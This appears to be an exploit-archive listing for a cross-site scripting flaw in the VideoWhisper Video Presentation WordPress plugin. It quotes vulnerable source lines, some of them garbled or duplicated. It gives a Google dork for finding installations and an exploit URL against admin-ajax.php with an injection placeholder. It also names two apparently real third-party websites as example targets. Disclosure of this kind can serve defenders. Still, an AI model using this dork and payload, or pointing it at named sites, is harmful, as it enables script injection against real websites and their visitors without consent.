Wordpress VideoWhisper Video Presentation plugin XSS Vulnerability

2015-11-30T00:00:00
ID 1337DAY-ID-24633
Type zdt
Reporter sniper.t
Modified 2015-11-30T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ######################################################################
# Exploit Title: Wordpress plugin videowhisper-video-presentation  XSS Vulnerability
# Vendor or Software Link: https://wordpress.org/plugins/videowhisper-video-presentation/
# Google dork: inurl:/wp-content/plugins/videowhisper-video-presentation
######################################################################
 
 The code in ./videowhisper-video-presentation/videowhisper_presentation.php
 

    2: echo echo "<BR><a target='_blank' href='" . $admin_ajax . "?action=vwcns_trans&task=html5&room=$room&stream=$room'> Preview </a> (open in Safari)"; 

    1075: $admin_ajax = admin_url() . 'admin-ajax.php'; 

    977: $room = sanitize_file_name($_GET['room']); 

    977: $room = sanitize_file_name($_GET['room']);; 
 
 
 
 
 
Exploit Code
http://server/wp-admin/admin-ajax.php?action=vwcns_trans&task=html5&room=room&stream=room=/*XSS_HERE*/


example

http://www.freelancewritersacademy.com/wp-admin/admin-ajax.php?action=vwcns_trans&task=html5&room=room&stream=room=/*XSS_HERE*/
http://www.learningunlimited.co/wp-admin/admin-ajax.php?action=vwcns_trans&task=html5&room=room&stream=room=/*XSS_HERE*/

#  0day.today [2018-01-05]  #